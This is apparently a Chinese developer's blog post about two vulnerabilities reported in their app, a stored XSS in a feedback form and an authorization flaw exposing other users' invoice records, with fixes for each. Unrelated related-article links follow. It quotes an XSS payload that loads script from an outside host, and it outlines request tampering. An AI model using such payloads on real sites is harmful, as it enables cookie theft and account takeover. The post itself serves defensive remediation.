某天早上打开邮箱看到网警邮件告知”跨站脚本攻击“---XSS(存储型)

威胁描述 :跨站脚本攻击简称为 XSS 又叫 CSS (Cross Site Script
Execution),是指服务器端的 CGI 程序没有对用户提交的变量中的
HTML 代码进行有效的过滤或转换,允许攻击者往 WEB 页面里插入
对终端用户造成影响或损失的 HTML 代码。所造成的影响主要是窃
取用户登录凭证(Cookies)、挂马攻击、页面访问挟持等。

范围:from表单提交---APP内嵌H5页面

漏洞 URL
http://api-service.XXXXX.com/api/feedback/add?rcode=6200&time=1583133341&sign=47c8a6dd58d71c13f4529f1127ceb10f
输入内容,并插入 XSS 代码:我就是来搞事的<sCript sRC=//xs.ax/BPVI></sCrIpT>
成功提交,还是没大佬来搞事,先不说了
先补锅,先补锅,先补锅:No.1不让在客户端提交此类特殊表单,但这只是拦在门外的方法;No.2接口增加验证;
验证修复:

1. 对用户输入的数据进行严格过滤,包括但不限于以下字符及字
符串 Javascript script src img onerror { } ( ) < > = , . ; :
"" ' # ! & / * \
2. 根据页面的输出背景环境,对输出进行编码
3. 使用一个统一的规则和库做输出编码
4. 对于富文本框,使用白名单控制输入,而不是黑名单
5. 在 Cookie 上设置 HTTPOnly 标志,从而禁止客户端脚本访问
Cookie。
一波未停一波又起,又来邮件emmmm--- 敏感信息泄露
威胁描述 :造成大量客户的个人信息泄漏
范围:登录用户信息,增删改其他用户记录---APP,赠票资质
漏洞 url:https://XX.XXXXX.cn/member/invoice
拦截并修改数据:查找页面元素,抓包工具拦截请求并修改,从而达到效果
先补锅,先补锅,先补锅:请求增加用户权限验证
验证修复:
1.对用户操作进行权限校验,防止通过修改参数进入未授权页面及
进行非法操作,建议在服务端对请求的数据和当前用户身份做一个
校验检查。流程描述:在服务器接收到用户发送的页面访问请求时,
根据预设的识别策略,从用户的页面访问请求中提取该用户对应的
用户唯一标识信息,同时提取所述页面访问请求对应的应答页面中
的表单及该表单中不可修改参数,将所述表单及不可修改参数与所
述用户唯一标识信息绑定后记录到参数列表中;检测到用户提交请
求页面的表单时,将所述请求页面的表单及不可修改参数与该用户
对应的所述参数列表中记录的表单及不可修改参数进行比对,控制
该用户的访问

安全路上慢慢走,持续更新相关推荐

  1. C++_Leetcode刷题之路——简单(持续更新)

    目录 1. 两数之和 解一: 解二: 7. 整数反转 解一: 9. 回文数 解一: 13. 罗马数字转整数 解一: 14. 最长公共前缀 解一: 20. 有效的括号 解一: 21. 合并两个有序链表 ...

  2. vue进阶之路 webpack打包 持续更新

    MVVM设计思想 M(model) V(view) VM(View-Model) Vue生命周期 挂载(初始化相关属性) beforeCreate->在实力初始化之后,数据观测和配置之前被调用 ...

  3. 软件测试进阶之路 - 目录 (持续更新)

    1. 软件测试基础 1-1 计算机基础 1-1.1 近代计算机的发展史 1-1.2 计算机分代 1-1.3 计算机分类 1-1.4 计算机的组成 1-1.5 操作系统基础 1-1.6 Windows ...

  4. 《财富自由之路》——博多.舍费尔(持续更新中)2020-11-05

    <财富自由之路>--博多.舍费尔(持续更新中) 重新定义金钱的概念 自我分析财务状况 创造奇迹 你真正想要的是什么 责任意味着什么 重新定义金钱的概念 人应该热爱财富,同样有义务创造财富. ...

  5. 2018秋招心酸路---持续更新【面挂家】

    本来想着自己搭个博客记录一下秋招找工作的经历,无奈失败,还是在这记录一下吧.... 1.百度度秘部门 GG 现场面:找学长内推的: 一面:聊简历,扯项目:写了个快排,字符串翻转:聊了一些Linux命令 ...

  6. 1个人70万行代码,20年持续更新,这款游戏号称开发到死,永不停更

    梦晨 博雯 发自 凹非寺 量子位 报道 | 公众号 QbitAI 这是一款「开发到死」,「永不停更」的游戏. 兄弟两人,一人开发,一人剧情,共同维持了这款游戏近20年. 现在的玩家刚刚打开它,往往会发 ...

  7. 网络流题目详讲+题单(提高版)(持续更新中......)

    网络流题目详讲+题单(提高版)(持续更新中......) 标签:图论--网络流 PS:如果你觉得自己还不够强(和我一样弱),可以去入门版看看 阅读体验:https://zybuluo.com/Junl ...

  8. 图谱(学习地图)系列总结,持续更新中

    目录 1.2022年最新前端学习路线图 2.2022年最新大数据学习路线图 3.2022年最新javaEE学习路线图 4.2022年最新UI/UE学习路线图 5.2022年java学习路线指南 6.J ...

  9. 程序员的职业选择,你应该知道的,持续更新ing

    程序员的职业选择,你应该知道的,持续更新ing 一下内容只是个人认知的表达,仅供参考,互相交流,不喜勿喷 程序员的职业选择,你应该知道的,持续更新ing 我认识很多猎头,有些曾经是经验丰富的HR,以下 ...

最新文章

  1. 让你的系统“坚挺不倒”的最后一个大招——「降级」
  2. python enumerate_python中enumerate的用法实例解析
  3. ASM文件拷贝到本地
  4. [转载]matlab中控制mesh或者surf的颜色
  5. android studio turn off hyperv,Android Studio 无法运行模拟器
  6. LeetCode 1099. 小于 K 的两数之和(二分查找)
  7. 钉钉 php 推送,微信模板推送,钉钉信息推送
  8. JAVA之旅(五)——this,static,关键字,main函数,封装工具类,生成javadoc说明书,静态代码块...
  9. 2021牛客暑期多校训练营9,签到题HE
  10. Notepad++使用心得和特色功能介绍
  11. 为什么说图形数据库是大数据时代的利器?
  12. 左对齐 latex_LaTex中使用XYpic绘制交换图表
  13. sqlserver2005-error:4064
  14. 量化交易(QuantitativeTrading)
  15. 今天拿到软件设计师证书
  16. ubuntu下python安装wx包出错解决办法
  17. 计算机 睡眠 无法打印,台式机睡眠后打不开怎么办
  18. 为macbook双系统的windows装驱动
  19. 洛谷P4711 【化学】 相对分子质量 简单题解
  20. web前端工程师简历

热门文章

  1. ssb调制解调matlab仿真设计,单边带SSB调制解调的MATLAB仿真.doc
  2. 原厂HT7525.HT7530.HT7533.HT7536.HT7544.HT7550三端稳压管,性价比高
  3. antd form方法
  4. [转]视频捕捉全教程(vc+vfw)
  5. Android Studio项目打包生成可安装在自己手机上的App安装包文件
  6. 7-20 藏尾诗 (20 分)
  7. 《MongoDB入门教程》第19篇 文档更新之$rename操作符
  8. Secondary NameNode和Standby NameNde的区别
  9. 蓝桥杯 算法提高VIP 阮小二买彩票 (Java解题)
  10. java ee开发技术 上海大学_上海大学计算机工程与科学学院研究生导师简介-刘 炜副研究员...